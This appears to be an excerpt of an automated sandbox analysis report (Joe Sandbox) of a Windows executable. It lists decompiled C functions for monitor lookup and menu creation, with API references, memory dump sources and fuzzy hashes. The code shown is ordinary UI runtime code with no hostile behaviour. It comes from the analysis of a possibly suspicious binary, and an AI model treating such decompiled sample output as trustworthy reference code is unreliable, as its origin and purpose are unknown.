                                                    • Instruction Fuzzy Hash: 8E118C31A042585BC711DA6DC889BDF7BE8AF49328F044296FD04EB382D779ED0587D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E0042C794(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t15;
                                                    				void* _t16;
                                                    				intOrPtr _t18;
                                                    				signed int _t19;
                                                    				void* _t20;
                                                    				intOrPtr _t21;
                                                    
                                                    				_t19 = _a12;
                                                    				if( *0x49e92b != 0) {
                                                    					_t16 = 0;
                                                    					if((_t19 & 0x00000003) != 0) {
                                                    						L7:
                                                    						_t16 = 0x12340042;
                                                    					} else {
                                                    						_t21 = _a4;
                                                    						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                                                    							goto L7;
                                                    						}
                                                    					}
                                                    				} else {
                                                    					_t18 =  *0x49e90c; // 0x42c794
                                                    					 *0x49e90c = E0042C4FC(3, _t15, _t18, _t19, _t20);
                                                    					_t16 =  *0x49e90c(_a4, _a8, _t19);
                                                    				}
                                                    				return _t16;
                                                    			}













                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 0042C7E2
                                                    • GetSystemMetrics.USER32 ref: 0042C7F4
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MetricsSystem$AddressProc
                                                    • String ID: MonitorFromPoint
                                                    • API String ID: 1792783759-1072306578
                                                    • Opcode ID: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                    • Instruction ID: 3a8d409507ccd0e879ce772a810bcfc943f8b0dcea0ef563c0c7703c31a9de97
                                                    • Opcode Fuzzy Hash: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                    • Instruction Fuzzy Hash: 3201A271301128AFDB10AF56ECC8B5EBB55EB90366FC0C037F9059B251C378AC008B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E0042C66C(intOrPtr* _a4, signed int _a8) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				intOrPtr* _t14;
                                                    				intOrPtr _t16;
                                                    				signed int _t17;
                                                    				void* _t18;
                                                    				void* _t19;
                                                    
                                                    				_t17 = _a8;
                                                    				_t14 = _a4;
                                                    				if( *0x49e92a != 0) {
                                                    					_t19 = 0;
                                                    					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                                                    						_t19 = 0x12340042;
                                                    					}
                                                    				} else {
                                                    					_t16 =  *0x49e908; // 0x42c66c
                                                    					 *0x49e908 = E0042C4FC(2, _t14, _t16, _t17, _t18);
                                                    					_t19 =  *0x49e908(_t14, _t17);
                                                    				}
                                                    				return _t19;
                                                    			}












                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 0042C6BD
                                                    • GetSystemMetrics.USER32 ref: 0042C6C9
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MetricsSystem$AddressProc
                                                    • String ID: MonitorFromRect
                                                    • API String ID: 1792783759-4033241945
                                                    • Opcode ID: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                    • Instruction ID: ff17a17d24a28b56e0f59b29e5112e5d3ba35734792e5f6c57e17e57efd49fd6
                                                    • Opcode Fuzzy Hash: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                    • Instruction Fuzzy Hash: 1601A771301128ABD760CB05F8C9B1A7755E764361F845077E805CB246C778EC40CBAC
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0044AE70(void* __eax) {
                                                    				void* _t16;
                                                    				intOrPtr _t17;
                                                    
                                                    				_t16 = __eax;
                                                    				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
                                                    					_t17 =  *0x449b38; // 0x449b84
                                                    					if(E00403D78( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
                                                    						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
                                                    					} else {
                                                    						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
                                                    					}
                                                    					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
                                                    						E00449F18();
                                                    					}
                                                    					E0044AC00(_t16);
                                                    				}
                                                    				return  *((intOrPtr*)(_t16 + 0x34));
                                                    			}





                                                    APIs
                                                    • CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                    • CreateMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateMenu$Popup
                                                    • String ID: .B
                                                    • API String ID: 257293969-2011479308
                                                    • Opcode ID: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                    • Instruction ID: ec3ec204bd3e4010e8879658da88cb666e7af430c2d7f16cc051fc7c4e83f06b
                                                    • Opcode Fuzzy Hash: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                    • Instruction Fuzzy Hash: BFE06D306822008FEB50EF65DAC564A3BA8AF05309F9034BAA8119F347C738DC958B5A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%